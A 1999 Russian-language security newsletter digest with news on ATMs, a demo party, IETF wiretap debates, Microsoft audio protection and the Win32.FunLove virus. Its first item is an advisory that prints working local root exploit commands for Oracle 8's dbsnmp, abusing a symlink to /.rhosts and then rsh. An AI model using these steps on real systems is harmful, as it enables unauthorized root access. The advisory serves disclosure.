Отправляет email-рассылки с помощью сервиса Sendsay

Inroad Hi - Tech Review

  Все выпуски  

Служба Рассылок Городского Кота


Служба Рассылок Городского Кота

Обзор высоких технологий в области  защиты и взлома
/ новости / обзор рынка и комментарии к нему / 14.11.99 /

http://www.inroad.kiev.ua
ac@istrada.net.ua

Серьезная локальная уязвимость в Oracle 8

Утилита  dbsnmp  (suid  root)  при   отсутствии переменной ORACLE_HOME создает   dump-file  с  именем  dbsnmpc.log  не контролируя символьных линков и давая права заданные umask текущего пользователя на доступ к нему,  что позволяет любому пользователю переписать содержимое любого
файла.

Например:

  cd /tmp
  unset ORACLE_HOME
  umask 0000
  ln -s /.rhosts /tmp/dbsnmpc.log
  /u01/app/oracle/product/8.1.5/bin/dbsnmp
  echo "+ +" > /.rhosts
  rsh -l root localhost 'sh -i'
для получения root shell...

Обнаружил, Brock Tellier.

Copyright (C)
Infection


Прожорливые банкоматы

Кредитную карточку может использовать не столько богатый, сколько проворный гражданин. По крайней мере, в Австралии как свидетельствует местный потребительский журнал "Choice". Если клиент замешкался и не успел взять только что выданные деньги, банкоматы их "проглатывают". Так они устроены в целях безопасности.

Большинство банкоматов в Австралии прячут наличность, если вы не успели забрать ее в течение определенного времени иногда менее двадцати секунд. Так случилось с одной из жительниц пока она копалась в кошельке, банкомат успел не только выдать ей деньги, но и забрать их обратно. А если банкомат проглотил купюры обратно, это еще не значит, что они автоматически вернулись на ваш счет. Приходится обращаться в банк, чтобы поместить эту сумму вновь на свой счет. Восстанавливаются деньги довольно долго до 45 дней.

БЮЛЛЕТЕНЬ ИнАП


DreamHack'99

Закончилась DreamHack'99 demo party (Швеция, 4-7 ноября). На party присутствовало около 3000 человек, причем (и об этом организаторы заявляют с гордостью) из них 530 - девушки. Возникает законный вопрос - чем их туда заманили? :)

Первые места в некоторых номинациях:

PC Demo compo: Off by Doomsday
PC Intro: Goatzilla by Noice
Amiga demo: Myster & Tremor by Embassy
Amiga intro: Electra by Darkage

Скачать все это можно здесь.

Copyright (C) iNFUSED BYTES OnLine



Internet-стандарты не признают "подслушивания", но не всем это нравится

[news.cnet.com] Стандарты сети Internet отвергают саму идею перехвата информации, передаваемой по сети. Участники совещания Рабочей группы по инженерным проблемам Internet (Internet Engineering Task Force, IETF) договорились о недопустимости наличия в Internet-стандартах возможностей для перехвата сообщений любыми правительственными организациями, желающими "прослушивать" онлайновые коммуникации.

На совещании IETF дебатировался вопрос о том, может ли федеральный закон США, требующий от телефонной инфраструктуры поддержки функций прослушивания переговоров правоохранительными органами, быть применен и к Internet-телефонии.

Основным возражением против прослушивания было то, что наличие таких возможностей на уровне стандартов делает системы связи менее защищенными. Такие системы связи будут более уязвимы для различного рода незаконных вторжений, они не будут обеспечивать защиту частной информации пользователей и ограничат возможности внедрения новейших достижений в области телекоммуникаций. Кроме того, обеспечение возможностей прослушивания увеличит стоимость создания систем связи, и эти затраты будут неизбежно заложены в стоимость услуг связи для конечных пользователей. Во всяком случае, пока IETF не собирается закладывать в Internet-протоколы такие функции.

Известно, что во многих странах (и в России тоже) соответствующие правительственные организации требуют от телефонных компаний такой организации своих сетей, которая облегчила бы полиции прослушивание телефонных переговоров. С появлением Internet-телефонии, работающей по протоколу IP, ФБР обнаружило новую для себя угрозу и обратилось в IETF с просьбой рассмотреть введение аналогичных мер для облегчения надзора за гражданами и в Internet.

Copyright (C) InfoArt News Agency


Microsoft поможет разработчикам защитить цифровые аудиозаписи

[Newsbytes] Корпорация Microsoft представила технологию, которая, по ее заявлению, упростит для разработчиков создание Windows-приложений для цифровых музыкальных устройств, защищенных от посягательств пиратов от музыки.

Технология называется Windows Media Device Manager (WMDM). По заявлению Microsoft, она позволит ускорить выпуск продуктов, обеспечивающих защиту авторских прав на музыкальные записи. Эта технология предлагает стандартный способ преобразования защищенных авторскими правами MP3- или WMA-файлов для записи на портативные носители типа карт флэш-памяти. В WMDM включена также поддержка систем, контролирующих распространение через Internet информации, защищенной авторскими правами.

Напомним, что Microsoft выпустила свой формат для музыкальных записей WMA в августе этого года как альтернативу для MP3. И вскоре после выпуска хакеры успешно взломали его систему защиты.

Copyright (C) InfoArt News Agency


"Лаборатория Касперского" о новом вирусе Win32.FunLove

Мы уже сообщали сегодня о появлении вируса FunLove. Теперь предлагаем вашему вниманию подробное описание этого вируса от известного российского разработчика антивирусных систем безопасности компании "Лаборатория Касперского".

Вирус Win32.FunLove обнаружен в "диком виде" (In-the-Wild), т.е. для компьютерных пользователей существует реальная опасность заражения данным вирусом.

Win32.FunLove является неопасным резидентным паразитическим Win32 вирусом. Он заражает PE (Portable Executable) файлы на локальных и сетевых дисках. Благодаря своей способности размножаться по локальной сети вирус может заразить всю корпоративную сеть с одной рабочей станции, если ей предоставлены права записи на сетевые диски.

Файлы, зараженные вирусом Win32.FunLove, можно легко распознать по строке (название популярной западной рок-группы), содержащейся в его теле: "Fun Loving Criminal".

После запуска зараженного файла, вирус создает в системной директории Windows файл FLCSS.EXE ("Дроппер"), в который записывает свой "чистый" код, и затем запускает его на выполнение. "Дроппер" вируса является обычным файлом формата Win32 PE. Под операционными системами Windows 95 и Windows 98 он запускается в качестве скрытого (hidden) Windows приложения, а под Windows NT - как сервис. После этого активизируется процедура заражения системы.

В случае возникновения ошибки в процессе создания "дроппера" для заражения системы, вирус все равно запускает эту процедуру заражения, но уже непосредственно из своего тела, а не через "дроппер". Процесс поиска и заражения файлов происходит в фоновом режиме (thread), в результате чего уже зараженные файлы выполняются без заметных задержек.

В процессе заражения системы вирус сканирует все локальные диски от C: до Z:, затем просматривает дерево директорий сетевых ресурсов и заражает все PE файлы с расширениями .OCX, .SCR и .EXE. Вирус записывает свой код в последнюю секцию файла (увеличивая тем самым размер файла на 4099 байтов) и добавляет в стартовый адрес инструкцию "JumpVirus". Данная инструкция обеспечивает запуск вируса из последней секции файла перед выполнением самой программы.

Вирус проверяет имена файлов и не заражает файлы по следующим маскам: ALER*, AMON*, _AVP*, AVP3*, AVPM*, F-PR*, NAVW*, SCAN*, SMSS*, DDHE*, DPLA*, MPLA*.

Вирус имеет черты семейства вирусов {"Bolzano":Win32_Bolzano}. Он изменяет файлы NTLDR и WINNT\System32\ntoskrnl.exe тем же самым способом, что и вирус "Bolzano". Измененные файлы можно восстановить из резервной копии.

Процедуры обнаружения и удаления вируса Win32.FunLove содержатся во внеочередном обновлении антивирусных баз AntiViral Toolkit Pro (AVP) и доступны на сайте "Лаборатории Касперского" по адресу http://www.avp.ru.

Copyright (C) InfoArt News Agency

Журнал PC Club


Обновлен сервер "Проекта - Inroad"

Новости "день в день"
Обновления каждые 3 часа!

Архив новостей
Последние новости за два месяца

Беспроводный доступ в Интернет
предоставлен  фирмой  InterStrada

http://www.citycat.ru/ ═══════ E-mail: citycat@citycat.ru

В избранное